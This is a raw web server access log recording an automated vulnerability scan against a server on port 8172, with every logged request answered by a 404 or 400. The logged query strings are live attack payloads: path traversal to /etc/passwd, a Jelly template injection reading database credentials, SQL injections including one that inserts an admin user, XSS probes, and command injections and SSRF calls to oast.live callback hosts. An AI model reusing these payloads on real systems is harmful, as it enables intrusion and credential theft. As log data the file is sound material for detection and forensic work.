Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 55 2024-12-12 18:13:57 103.153.214.94 GET /login.do jvar_page_title=%3Cstyle%3E%3Cj%3Ajelly%2Bxmlns%3Aj%3D%22jelly%3Acore%22%2Bxmlns%3Ag%3D'glide'%3E%3Cg%3Aevaluate%3Ez%3Dnew%2BPackages.java.io.File(%22%22).getAbsolutePath()%3Bz%3Dz.substring(0%2Cz.lastIndexOf(%22%2F%22))%3Bu%3Dnew%2BSecurelyAccess(z.concat(%22%2Fco..nf%2Fglide.db.properties%22)).getBufferedReader()%3Bs%3D%22%22%3Bwhile((q%3Du.readLine())!%3D%3Dnull)s%3Ds.concat(q%2C%22%5Cn%22)%3Bgs.addErrorMessage(s)%3B%3C%2Fg%3Aevaluate%3E%3C%2Fj%3Ajelly%3E%3C%2Fstyle%3E 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_17)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 205 2024-12-12 18:16:27 103.153.214.94 GET /asispanel/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.1.1 - 404 7 0 226 2024-12-12 18:16:43 103.153.214.94 GET /admin/login - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.20 - 404 7 0 204 2024-12-12 18:16:47 103.153.214.94 GET /Setup/index.php/ - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 64 2024-12-12 18:16:47 103.153.214.94 GET /compress.php file=../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 35 2024-12-12 18:16:54 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 56 2024-12-12 18:16:56 103.153.214.94 GET /-/media/doo-doo.ashx - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 196 2024-12-12 18:17:05 103.153.214.94 GET /index.php/component/jemessenger/box_details task=download&dw_file=../../.././../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:92.0)+Gecko/20100101+Firefox/92.0 - 404 7 0 41 2024-12-12 18:17:10 103.153.214.94 GET /index.php option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:103.0)+Gecko/20100101+Firefox/103.0 - 404 7 0 80 2024-12-12 18:17:12 103.153.214.94 GET /api/get-browser-snapshot snapshot_path=/etc/passwd 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.2.27 - 404 7 0 220 2024-12-12 18:17:12 103.153.214.94 POST /device/description_en.html - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.2.19 - 404 7 0 213 2024-12-12 18:17:45 103.153.214.94 GET /NCFindWeb service=IPreAlertConfigService&filename=WEB-INF/web.xml 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/117.0.0.0+Safari/537.36 - 404 7 0 59 2024-12-12 18:17:47 103.153.214.94 GET /v1/cs/configs export=true&group&tenant&appName&ids&dataId 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.19041 - 404 7 0 41 2024-12-12 18:17:49 103.153.214.94 GET /cors_proxy/https:/oast.me/ - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.4.16 - 400 0 0 44 2024-12-12 18:17:54 103.153.214.94 GET /index.php option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 43 2024-12-12 18:17:57 103.153.214.94 GET /tiki-jsplugin.php plugin=x&language=../../../../../../../../../../windows/win.ini 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.18 - 404 7 0 36 2024-12-12 18:18:12 103.153.214.94 GET /wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php open=../../../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+LoiLoNote/15.0.0+Version/17.3.1+Safari/605.1.15 - 404 7 0 65 2024-12-12 18:18:18 103.153.214.94 GET /admin/diagnostic.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 57 2024-12-12 18:18:21 103.153.214.94 GET /api/portalTsLogin/utils/getE9DevelopAllNameValue2 fileName=portaldev_%2f%2e%2e%2fweaver%2eproperties 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.3.27 - 404 7 0 75 2024-12-12 18:18:22 103.153.214.94 GET /admin/diagnostic.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 34 2024-12-12 18:18:26 103.153.214.94 GET /admin/diagnostic.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 57 2024-12-12 18:18:29 103.153.214.94 GET / a=display&templateFile=README.md 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:81.0)+Gecko/20100101+Firefox/81.0 - 404 7 0 45 2024-12-12 18:18:30 103.153.214.94 GET / {alert(document.domain)} 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 57 2024-12-12 18:18:53 103.153.214.94 GET /config.properties - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 65 2024-12-12 18:18:58 103.153.214.94 GET /config.properties.bak - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.11;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 404 7 0 41 2024-12-12 18:19:02 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/102.0.0.0+Safari/537.36 - 404 7 0 202 2024-12-12 18:19:02 103.153.214.94 GET /ui_config.properties - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 61 2024-12-12 18:20:16 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 205 2024-12-12 18:20:27 103.153.214.94 POST /postlocal - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 222 2024-12-12 18:20:33 103.153.214.94 GET /yHsLLK.txt true 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Mobile/15E148+Safari/604.1 - 404 7 0 219 2024-12-12 18:21:21 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 202 2024-12-12 18:21:49 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/58.0.3029.110+Safari/537.36+Edge/16.16299 - 404 7 0 204 2024-12-12 18:22:30 103.153.214.94 GET /js/hrm/getdata.jsp cmd=getSelectAllId&sql=select+547653*865674+as+id 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.6.25 - 404 7 0 40 2024-12-12 18:22:36 103.153.214.94 GET /users/sign_in - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 65 2024-12-12 18:23:12 103.153.214.94 GET / wc-api=payplus_gateway&status_code=true&more_info=(select*from(select(sleep(6)))a) 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 203 2024-12-12 18:23:17 103.153.214.94 GET /pentaho/api/userrolelist/systemRoles require-cfg.js 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 80 2024-12-12 18:23:22 103.153.214.94 GET /api/userrolelist/systemRoles require-cfg.js 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11_12)+AppleWebKit/618.17.9+(KHTML,+like+Gecko)+Version/17.4+Safari/618.17.9 - 404 7 0 37 2024-12-12 18:23:24 103.153.214.94 GET /workflow/ - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 203 2024-12-12 18:23:24 103.153.214.94 GET /workflow/servlet/pdf_servlet JOBID=1%27%3BINSERT+INTO+DOCTERA_USERS+%28USERNAME%2C+PASSWORD%2C+ENCPASSWORD%2C+FIRSTNAME%2C+LASTNAME%2C+COMPANY%2C+ADDRESS%2C+ADDRESS2%2C+CITY%2C+STATE%2C+ALTPHONE%2C+ZIP%2C+COUNTRY%2C+PHONE%2C+FAX%2C+EMAIL%2C+LASTLOGIN%2C+CREATION%2C+PREFERREDSERVER%2C+CREDITCARDTYPE%2C+CREDITCARDNUMBER%2C+CREDITCARDEXPIRY%2C+ACCOUNTSTATUS%2C+USERTYPE%2C+COMMENT%2C+ADMIN%2C+SUPERADMIN%2C+ACCEPTEMAIL%2C+ALLOWHOTFOLDER%2C+PROTOCOL%2C+BANDWIDTH%2C+DIRECTORY%2C+SLOWSTARTRATE%2C+USESLOWSTART%2C+SLOWSTARTAGGRESSIONRATE%2C+BLOCKSIZE%2C+UNITSIZE%2C+NUMENCODERS%2C+NUMFTPSTREAMS%2C+ALLOWUSERBANDWIDTHTUNING%2C+EXPIRYDATE%2C+ALLOWTEMPACCOUNTCREATION%2C+OWNERUSERNAME%2C+USERLEVEL%2C+UPLOADMETHOD%2C+PW_CHANGEABLE%2C+PW_CREATIONDATE%2C+PW_DAYSBEFOREEXPIRE%2C+PW_MUSTCHANGE%2C+PW_USEDPASSWORDS%2C+PW_NUMERRORS%29+VALUES%28%272q6jqqocpxbdkuwxtssi1layvxp%27%2C+NULL%2C+%27CD72EF40188EA508C2BFC2E3B65F3D6C%27%2C+%272q6jqqocpxbdkuwxtssi1layvxpFirstName%27%2C+%272q6jqqocpxbdkuwxtssi1layvxpLastName%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27202-404-2400%27%2C+%27%27%2C+%272q6jqqocpxbdkuwxtssi1layvxp%40mydomain.local%27%2C+1714014839723%2C+1714013661166%2C+%27default%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27full+access%27%2C+%27%27%2C+%27%27%2C+1%2C+0%2C+0%2C+0%2C+%27DEFAULT%27%2C+%270%27%2C+0%2C+%270%27%2C+1%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+0%2C+0%2C+0%2C+%27%27%2C+0%2C+%27DEFAULT%27%2C+0%2C+1714014752270%2C+-1%2C+0%2C+NULL%2C+0%29%3B--+- 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 201 2024-12-12 18:23:25 103.153.214.94 GET /workflow/jsp/logon.jsp - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 217 2024-12-12 18:23:54 103.153.214.94 GET /jkstatus - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.6.18 - 404 7 0 61 2024-12-12 18:24:00 103.153.214.94 GET /jkstatus; - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 32 2024-12-12 18:24:02 103.153.214.94 POST /chat/completions - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 286 2024-12-12 18:25:15 103.153.214.94 GET /home/000~ROOT~000/etc/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.26 - 404 7 0 40 2024-12-12 18:25:19 103.153.214.94 GET /000~ROOT~000/etc/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12_0)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.15 - 404 7 0 42 2024-12-12 18:25:24 103.153.214.94 GET /OLDS/home/000~ROOT~000/etc/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/100.0.4896.127+Safari/537.36 - 404 7 0 62 2024-12-12 18:25:30 103.153.214.94 GET /app/webroot/files/kcfinder/files/home/000~ROOT~000/etc/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 69 2024-12-12 18:26:16 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 223 2024-12-12 18:27:10 103.153.214.94 PUT /wp-json/seopress/v1/posts/1/title-description-metas - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/93.0.4577.82+Safari/537.36 - 404 7 0 274 2024-12-12 18:28:03 103.153.214.94 GET /ems/cgi-bin/ezrf_upgrade_images.cgi op_type=deleteprogressfile&progressfile=lfG3q%3Bcurl+ctcj3jjbclslbev4n7q0g7f1aupa1fxjy.oast.live+%23 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 36 2024-12-12 18:28:10 103.153.214.94 GET /lang/log/system.log - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:71.0)+Gecko/20100101+Firefox/71.0 - 404 7 0 36 2024-12-12 18:28:11 103.153.214.94 GET /modules/thumb/thumb.php url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.7.24 - 404 7 0 32 2024-12-12 18:28:11 103.153.214.94 GET /.htpasswd - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 37 2024-12-12 18:28:27 103.153.214.94 GET /wp-json/wp/v2/give_forms/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 228 2024-12-12 18:28:27 103.153.214.94 POST /api/v0/train - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.2+Safari/605.1.15 - 404 7 0 224 2024-12-12 18:28:45 103.153.214.94 GET /interface-data/books-init - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 239 2024-12-12 18:29:01 103.153.214.94 GET /down_data.php filename=../../../../../../../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12_2_8;+en)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.2+Safari/605.1.15 - 404 7 0 149 2024-12-12 18:29:05 103.153.214.94 GET /premise/front/getPingData url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id; 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 41 2024-12-12 18:29:06 103.153.214.94 GET /base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 11 0 32 2024-12-12 18:29:06 103.153.214.94 GET /server/ - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.7.25 - 404 7 0 56 2024-12-12 18:29:15 103.153.214.94 GET /search/members/ id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%27796c767772%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/79.0.3945.130+Safari/537.36 - 404 7 0 85 2024-12-12 18:29:24 103.153.214.94 GET /secure/ContactAdministrators!default.jspa - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 60 2024-12-12 18:29:25 103.153.214.94 POST /jtcgi/soap_cgi.pyc - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Whale/3.26.244.21+Safari/537.36 - 404 7 0 196 2024-12-12 18:29:33 103.153.214.94 GET /wp-content/plugins/simple-ajax-chat/sac-export.csv - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 60 2024-12-12 18:29:55 103.153.214.94 GET /wp-content/plugins/cz-loan-management/README.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:71.0)+Gecko/20100101+Firefox/71.0 - 404 7 0 199 2024-12-12 18:30:12 103.153.214.94 POST /v1/proxy/test - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.54 - 404 7 0 200 2024-12-12 18:30:48 103.153.214.94 GET /interface-data/books-init - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 212 2024-12-12 18:30:51 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 227 2024-12-12 18:31:56 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11)+AppleWebKit/616.16+(KHTML,+like+Gecko)+Version/17.0.90+Safari/616.16 - 404 7 0 206 2024-12-12 18:32:47 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/94.0.4606.71+Safari/537.36 - 404 7 0 234 2024-12-12 18:32:47 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 260 2024-12-12 18:32:51 103.153.214.94 GET /;/WEB-INF/web.xml - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 40 2024-12-12 18:32:56 103.153.214.94 GET /resin-doc/;/WEB-INF/resin-web.xml - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 54 2024-12-12 18:33:44 103.153.214.94 GET /wp-content/plugins/mdc-youtube-downloader/includes/download.php file=/etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.63 - 404 7 0 36 2024-12-12 18:33:45 103.153.214.94 GET /index.php/admin/filemanager/sa/getZipFile path=/../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Safari/537.36+HeyTapBrowser/45.11.0.1.1+Chrome/91.0.4472.88 - 404 7 0 46 2024-12-12 18:34:26 103.153.214.94 GET /wp/wp-content/uploads/wpjobboard/ - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+rv:109.0)+Gecko/20100101+Firefox/118.0 - 404 7 0 63 2024-12-12 18:34:30 103.153.214.94 GET /wp-content/uploads/wpjobboard/ - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 40 2024-12-12 18:34:45 103.153.214.94 POST /cgi-bin/supervisor/Factory.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12_0)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.15 - 404 7 0 210 2024-12-12 18:35:21 103.153.214.94 GET /listing cat=6&filter=1&job-type=1&keywords=Mr.&location=1&order=desc&placeid=US&placetype=country&range1=1&range2=1)%20AND%20(SELECT%201864%20FROM%20(SELECT(SLEEP(6)))gOGh)%20AND%20(6900=6900&salary-type=1&sort=id&subcat 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 207 2024-12-12 18:35:31 103.153.214.94 GET /tiki-5.2/tiki-edit_wiki_section.php type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.2.22 - 404 7 0 70 2024-12-12 18:35:36 103.153.214.94 GET /tiki-edit_wiki_section.php type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 31 2024-12-12 18:35:45 103.153.214.94 GET /__weave/file/etc/passwd - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_17)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 209 2024-12-12 18:37:24 103.153.214.94 POST /index.php action=porte_plume_previsu 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 223 2024-12-12 18:38:06 103.153.214.94 GET /ProcessPlus - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/42.0.2311.135+Safari/537.36+Edge/12.10240 - 404 7 0 224 2024-12-12 18:38:12 103.153.214.94 GET /api/v1/apikey /api/v1/ping 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/document-stores 404 7 0 202 2024-12-12 18:38:52 103.153.214.94 GET /console/images/%2e%2e%2fconsole.portal _nfpb=true&_pageLabel&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://ctcj3jjbclslbev4n7q0y5ndmqk4i3pqe.oast.live') 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.79 - 400 0 0 61 2024-12-12 18:39:11 103.153.214.94 GET /login.do jvar_page_title=<style><foo>Injected+Title</foo></style> 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/617.7+(KHTML,+like+Gecko)+Version/17.3.74+Safari/617.7 - 404 7 0 93 2024-12-12 18:39:15 103.153.214.94 GET /plus/ajax_common.php act=hotword&query=aa%%e9%8c%a6%27%20union%20select%201,md5(999999999),3%23%27 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 54 2024-12-12 18:39:15 103.153.214.94 GET /index.php option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.3+Safari/605.1.15 - 404 7 0 54 2024-12-12 18:39:19 103.153.214.94 GET /services/pluginscript/..;/..;/..;/getFavicon host=ctcj3jjbclslbev4n7q05cox58rjymecp.oast.live 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 5 0 84 2024-12-12 18:39:20 103.153.214.94 GET /Umbraco/feedproxy.aspx url=http://ctcj3jjbclslbev4n7q08k1w63apm7eb1.oast.live 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.87+Safari/537.36 - 404 7 0 39 2024-12-12 18:39:36 103.153.214.94 GET /setup/index.jsp - 